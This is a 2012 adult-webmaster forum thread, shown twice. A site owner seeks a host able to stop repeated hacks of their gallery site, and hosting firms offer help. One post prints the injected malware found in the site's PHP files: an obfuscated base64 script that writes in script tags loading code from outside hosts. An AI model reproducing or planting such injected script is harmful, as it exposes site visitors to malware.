Hosting Companies - Contact Me - GoFuckYourself.com

Pseudonymous · 04-20-2012, 07:51 PM

I am currently hosting with somebody but one of my tgps is being hacked over and over and over and the techs don`t know how it`s being exploited I guess. Their only advice is to start over and reinstall everything on a fresh server. Well this isn`t possible. Firstly, im using a script they dont make anymore and secondly, the site is like 10 years old and the manpower of making the galleries and letting all that content run through again and then deleting the 14 out of the 15 pictures in each gal that didnt rank as high (smartthumbs ran) - It would take a solid year of working on it. Just not going to happen. The galleries are handpicked content that's not even in sponsors FHG either. Alot of it is members area stuff

I couldnt copy over the galleries to a new server because they'd no longer be synced with arylia/smartthumbs. And i can't copy all that stuff over because i could be copying over the exploit, most likely

So I was hoping there was somebody that I could transfer all my sites over to that WILL be able to figure out how it's being exploited and put an end to it.

While im not sure how easy it is to do this because i dont run a server company but i figured i would atleast put it out there because im pretty much out of options.

I just can't face that some idiot nobody hacker can't be stopped, you would think they could narrow down the issue with how it's being exploited considering it's been like 100 times now.

Or if anybody has any tips on how to stop/search for exploits. Ive used some pretty good shell exploit tools and they've found nothing.

My ICQ is in my profile

Poppy · 04-20-2012, 07:58 PM

Hi there. We would love to try and help you out here at MojoHost. We are a huge supporter of the adult industry and one of the best managed hosts around.

I tried to find info to contact you, but couldn't find anything.

I look forward to hearing from you.

Pseudonymous · 04-20-2012, 08:01 PM

Did you read my post? I expected an answer like, we have really good techs, ill have one contact you or something like that. Im not sure a rep would really be able to confirm that you guys could fix it if i made the switch. ;) Also if you read my post, i mentioned my ICQ is in my profile. Its in there. I double checked

AdultEUhost · 04-20-2012, 08:08 PM

what is the script you are referring too that is no longer made/supported? As you mentioned a few in your post.

I don't think any host can you give you the guarantee they will find it, it will be a best effort kind of thing. What exploit is it? redirects, iframes, malware? Is this the only domain on the server? Because if incorrectly setup (not different system users, suphp, etc) it might be the case that an other domain was infected but that they gained access to multiple domains.

If you don't want to share the info here, drop me an email.

Pseudonymous · 04-20-2012, 08:22 PM

Well I have other domains on the server but they aren't infected.

AutoGallerySQL is what they dont make anymore. Yeah I could purchase their newer script, export and import into that. but like i said, these are handmade galleries and it would truly take forever. it'd be basically makign the site over again and hoping it does as well. i dont want to start a website from scratch again and put in a crazy amount of man hours. I have my plate full before this, i just dont have the time. I bought the site because i dont have the time to be rebuilding each and every freaking thing from ground up

Well im not looking for a guarantee, i'm looking to explain the exact thing theyre doing and if its something they are real sure they can stop, ill move over, if they can't, ill point my domain back to my old server company and cancel. I truly think this is something that can be stopped and ill reward a server company for putting an end to it.

I guess malware? I mean it triggers googles safe browsing warning. I can't give you all details because no matter what i do, i can't see the issue myself. It seems mainly americans can see the ads. Its typically at the bottom of my site, and a banner. Im not sure what it is this time. Even when i use a proxy, i still can't see it though

At the bottom of my page

<script language="JavaScript" type="text/javascript">function decode64(input){var base64="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnop qrstuvwxyz0123456789+/=";var output="";var ch1,ch2,ch3,enc1,enc2,enc3,enc4;var i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{enc1=base64.indexOf(input.charAt(i++));en c2=base64.indexOf(input.charAt(i++));enc3=base64.i ndexOf(input.charAt(i++));enc4=base64.indexOf(inpu t.charAt(i++));ch1=(enc1<<2)|(enc2>>4);ch2=((enc2& 15)<<4)|(enc3>>2);ch3=((enc3&3)<<6)|enc4;output=ou tput+String.fromCharCode(ch1);if(enc3!=64)output=o utput+String.fromCharCode(ch2);if(enc4!=64)output= output+String.fromCharCode(ch3);ch1=ch2=ch3="";enc 1=enc2=enc3=enc4=""}while(i<input.length);return output;}document.write(decode64("PHNjcmlwdCBzcmM9I mh0dHA6Ly9wYWxhLm5ldC8ucGhwIj48L3NjcmlwdD4KPHNjcml wdCBzcmM9Imh0dHA6Ly95YWNsaXAuY29tL2luLnBocCI+PC9zY 3JpcHQ+CjxzY3JpcHQgc3JjPSJodHRwOi8vcGV5by5vcmcvLnp pcCI+PC9zY3JpcHQ+"));</script>

I get this garbage inserted into the html. Its at the bottom of every php file right now so it seems

The person seems to do something different everytime.

And my other domains are my paysites, this is my one tgp on this server. So maybe they do have access to all but only choosing to screw with the tgp because their tool works with tradescripts or who knows

AdultEUhost · 04-20-2012, 08:32 PM

If you want I can take a look at it, no strings attached.
That will be tomorrow though as it's 5.30 am here and I am done for today

Leave me an icq or email and I will reply when I am at the office tomorrow

Brad Mitchell · 04-20-2012, 08:36 PM

Quote:

Originally Posted by Pseudonymous

Did you read my post? I expected an answer like, we have really good techs, ill have one contact you or something like that. Im not sure a rep would really be able to confirm that you guys could fix it if i made the switch. ;) Also if you read my post, i mentioned my ICQ is in my profile. Its in there. I double checked

Of course we could fix you if you made the switch. Very likely, so could some of our competitors. You're not exactly blazing in unfamiliar territory, we host more than 50,000 porn sites. We have amazing techs, however, it wouldn't be at all normal for us to triage one of them without first talking to you. Most people don't populate their profile so I'm certain Paul was just reading your signature. Best of luck-

Brad

mightyjoe · 04-20-2012, 08:39 PM

Quote:

Originally Posted by Pseudonymous

(decode64("PHNjcmlwdCBzcmM9Imh0dHA6Ly9wYWxhLm5ldC8 ucGhwIj48L3NjcmlwdD4KPHNjcmlwdCBzcmM9Imh0dHA6Ly95Y WNsaXAuY29tL2luLnBocCI+PC9zY3JpcHQ+CjxzY3JpcHQgc3J jPSJodHRwOi8vcGV5by5vcmcvLnppcCI+PC9zY3JpcHQ+")

Pseudonymous · 04-20-2012, 08:47 PM

Quote:

Originally Posted by AdultEUhost

If you want I can take a look at it, no strings attached.
That will be tomorrow though as it's 5.30 am here and I am done for today

Leave me an icq or email and I will reply when I am at the office tomorrow

the thing is, i think i was told by tech theyre going to restore an old backup and probably temp fix the issue again (for the 50th time)... i want to tell them to hold off so that someone can see the issue

but i can't have my site down like it is right now, tgps aren't exactly stable.

left you a message anyway

Pseudonymous · 04-20-2012, 08:48 PM

I added both you guys from MojoHost on Skype. Accept me when you can

Adraco · 04-21-2012, 04:18 AM

I have had the same happening to me and Amerinoc solved it. Very likely will Brad and his guys at Mojo be able to do the same.

And of course fixing it is one thing, but then one need to prevent it from happening again, so tightening up file permission, ftp passwords and what not.

Turn to Mojo since they were here first and are good guys. Should it, for any one reason not work out, for what it's worth I can dearly recommend Amerinoc.

Good luck!

HomerSimpson · 04-21-2012, 05:38 AM

get hosting with WHM/cPanel from NakedHosting

hire me to move and secure your sites

and you'll never have these types of problems..

raymor · 04-21-2012, 05:57 AM

You said you don't see it. Search for your sure in Google and click do the referrer is set to Google. If you see it then, that tells us something important. Contract me for deails if you get the exploit when coming from Google.

Quote:

Well I have other domains on the server but they aren't infected

So the problem isn't the server, it's the script. Though tightening up some security related settings in PHP may make the hole in the script harder to exploit. You may be better off consulting a security company rather than a web hosting company.

04-20-2012, 07:51 PM	#1
Pseudonymous Photographer/Owner Industry Role: Join Date: Apr 2006 Location: Vancouver, Canada Posts: 2,661	Hosting Companies - Contact Me I am currently hosting with somebody but one of my tgps is being hacked over and over and over and the techs don`t know how it`s being exploited I guess. Their only advice is to start over and reinstall everything on a fresh server. Well this isn`t possible. Firstly, im using a script they dont make anymore and secondly, the site is like 10 years old and the manpower of making the galleries and letting all that content run through again and then deleting the 14 out of the 15 pictures in each gal that didnt rank as high (smartthumbs ran) - It would take a solid year of working on it. Just not going to happen. The galleries are handpicked content that's not even in sponsors FHG either. Alot of it is members area stuff I couldnt copy over the galleries to a new server because they'd no longer be synced with arylia/smartthumbs. And i can't copy all that stuff over because i could be copying over the exploit, most likely So I was hoping there was somebody that I could transfer all my sites over to that WILL be able to figure out how it's being exploited and put an end to it. While im not sure how easy it is to do this because i dont run a server company but i figured i would atleast put it out there because im pretty much out of options. I just can't face that some idiot nobody hacker can't be stopped, you would think they could narrow down the issue with how it's being exploited considering it's been like 100 times now. Or if anybody has any tips on how to stop/search for exploits. Ive used some pretty good shell exploit tools and they've found nothing. My ICQ is in my profile __________________ Previous owner of SoloRevenue Previous product manager @ Modelcentro.com/MCProfits.com, IsMyGirl.com, SMRevenue.com Last edited by Pseudonymous; 04-20-2012 at 07:56 PM..

04-20-2012, 07:58 PM	#2
Poppy Confirmed User Join Date: Apr 2002 Location: O H I O Posts: 6,254	Hi there. We would love to try and help you out here at MojoHost. We are a huge supporter of the adult industry and one of the best managed hosts around. I tried to find info to contact you, but couldn't find anything. I look forward to hearing from you. __________________ VP Sales, Peak5Payments [email protected] Skype: consultpoppy In adult since 98'

04-20-2012, 08:01 PM	#3
Pseudonymous Photographer/Owner Industry Role: Join Date: Apr 2006 Location: Vancouver, Canada Posts: 2,661	Did you read my post? I expected an answer like, we have really good techs, ill have one contact you or something like that. Im not sure a rep would really be able to confirm that you guys could fix it if i made the switch. ;) Also if you read my post, i mentioned my ICQ is in my profile. Its in there. I double checked __________________ Previous owner of SoloRevenue Previous product manager @ Modelcentro.com/MCProfits.com, IsMyGirl.com, SMRevenue.com

04-20-2012, 08:08 PM	#4
AdultEUhost ORLY? Industry Role: Join Date: Oct 2005 Location: NL & US Posts: 2,579	what is the script you are referring too that is no longer made/supported? As you mentioned a few in your post. I don't think any host can you give you the guarantee they will find it, it will be a best effort kind of thing. What exploit is it? redirects, iframes, malware? Is this the only domain on the server? Because if incorrectly setup (not different system users, suphp, etc) it might be the case that an other domain was infected but that they gained access to multiple domains. If you don't want to share the info here, drop me an email. __________________ ICQ: 267-443-722 / leon [at] adulteuhost [dotcom] Nominated for an XBIZ Award as "Webhost of the Year" in 2007, 2012, 2013 and 2014

04-20-2012, 08:22 PM	#5
Pseudonymous Photographer/Owner Industry Role: Join Date: Apr 2006 Location: Vancouver, Canada Posts: 2,661	Well I have other domains on the server but they aren't infected. AutoGallerySQL is what they dont make anymore. Yeah I could purchase their newer script, export and import into that. but like i said, these are handmade galleries and it would truly take forever. it'd be basically makign the site over again and hoping it does as well. i dont want to start a website from scratch again and put in a crazy amount of man hours. I have my plate full before this, i just dont have the time. I bought the site because i dont have the time to be rebuilding each and every freaking thing from ground up Well im not looking for a guarantee, i'm looking to explain the exact thing theyre doing and if its something they are real sure they can stop, ill move over, if they can't, ill point my domain back to my old server company and cancel. I truly think this is something that can be stopped and ill reward a server company for putting an end to it. I guess malware? I mean it triggers googles safe browsing warning. I can't give you all details because no matter what i do, i can't see the issue myself. It seems mainly americans can see the ads. Its typically at the bottom of my site, and a banner. Im not sure what it is this time. Even when i use a proxy, i still can't see it though At the bottom of my page <script language="JavaScript" type="text/javascript">function decode64(input){var base64="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnop qrstuvwxyz0123456789+/=";var output="";var ch1,ch2,ch3,enc1,enc2,enc3,enc4;var i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{enc1=base64.indexOf(input.charAt(i++));en c2=base64.indexOf(input.charAt(i++));enc3=base64.i ndexOf(input.charAt(i++));enc4=base64.indexOf(inpu t.charAt(i++));ch1=(enc1<<2)\|(enc2>>4);ch2=((enc2& 15)<<4)\|(enc3>>2);ch3=((enc3&3)<<6)\|enc4;output=ou tput+String.fromCharCode(ch1);if(enc3!=64)output=o utput+String.fromCharCode(ch2);if(enc4!=64)output= output+String.fromCharCode(ch3);ch1=ch2=ch3="";enc 1=enc2=enc3=enc4=""}while(i<input.length);return output;}document.write(decode64("PHNjcmlwdCBzcmM9I mh0dHA6Ly9wYWxhLm5ldC8ucGhwIj48L3NjcmlwdD4KPHNjcml wdCBzcmM9Imh0dHA6Ly95YWNsaXAuY29tL2luLnBocCI+PC9zY 3JpcHQ+CjxzY3JpcHQgc3JjPSJodHRwOi8vcGV5by5vcmcvLnp pcCI+PC9zY3JpcHQ+"));</script> I get this garbage inserted into the html. Its at the bottom of every php file right now so it seems The person seems to do something different everytime. And my other domains are my paysites, this is my one tgp on this server. So maybe they do have access to all but only choosing to screw with the tgp because their tool works with tradescripts or who knows __________________ Previous owner of SoloRevenue Previous product manager @ Modelcentro.com/MCProfits.com, IsMyGirl.com, SMRevenue.com Last edited by Pseudonymous; 04-20-2012 at 08:27 PM..

04-20-2012, 08:32 PM	#6
AdultEUhost ORLY? Industry Role: Join Date: Oct 2005 Location: NL & US Posts: 2,579	If you want I can take a look at it, no strings attached. That will be tomorrow though as it's 5.30 am here and I am done for today Leave me an icq or email and I will reply when I am at the office tomorrow __________________ ICQ: 267-443-722 / leon [at] adulteuhost [dotcom] Nominated for an XBIZ Award as "Webhost of the Year" in 2007, 2012, 2013 and 2014

04-20-2012, 08:48 PM	#10
Pseudonymous Photographer/Owner Industry Role: Join Date: Apr 2006 Location: Vancouver, Canada Posts: 2,661	I added both you guys from MojoHost on Skype. Accept me when you can __________________ Previous owner of SoloRevenue Previous product manager @ Modelcentro.com/MCProfits.com, IsMyGirl.com, SMRevenue.com

04-21-2012, 04:18 AM	#11
Adraco Confirmed User Industry Role: Join Date: May 2009 Location: Onboard an airplane around the globe Posts: 3,734	I have had the same happening to me and Amerinoc solved it. Very likely will Brad and his guys at Mojo be able to do the same. And of course fixing it is one thing, but then one need to prevent it from happening again, so tightening up file permission, ftp passwords and what not. Turn to Mojo since they were here first and are good guys. Should it, for any one reason not work out, for what it's worth I can dearly recommend Amerinoc. Good luck! __________________ ---------------------------------------------------------------------------------- The truth is not affected by the beliefs, or doubts, of the majority.

04-21-2012, 05:38 AM	#12
HomerSimpson Too lazy to set a custom title Industry Role: Join Date: Sep 2005 Location: Springfield Posts: 13,826	get hosting with WHM/cPanel from NakedHosting hire me to move and secure your sites and you'll never have these types of problems.. __________________ Make a bank with Chaturbate - the best selling webcam program Ads that can't be block with AdBlockers !!! /// Best paying popup program (Bitcoin payouts) !!! PHP, MySql, Smarty, CodeIgniter, Laravel, WordPress, NATS... fixing stuff, server migrations & optimizations... My ICQ: 27429884 \| Email: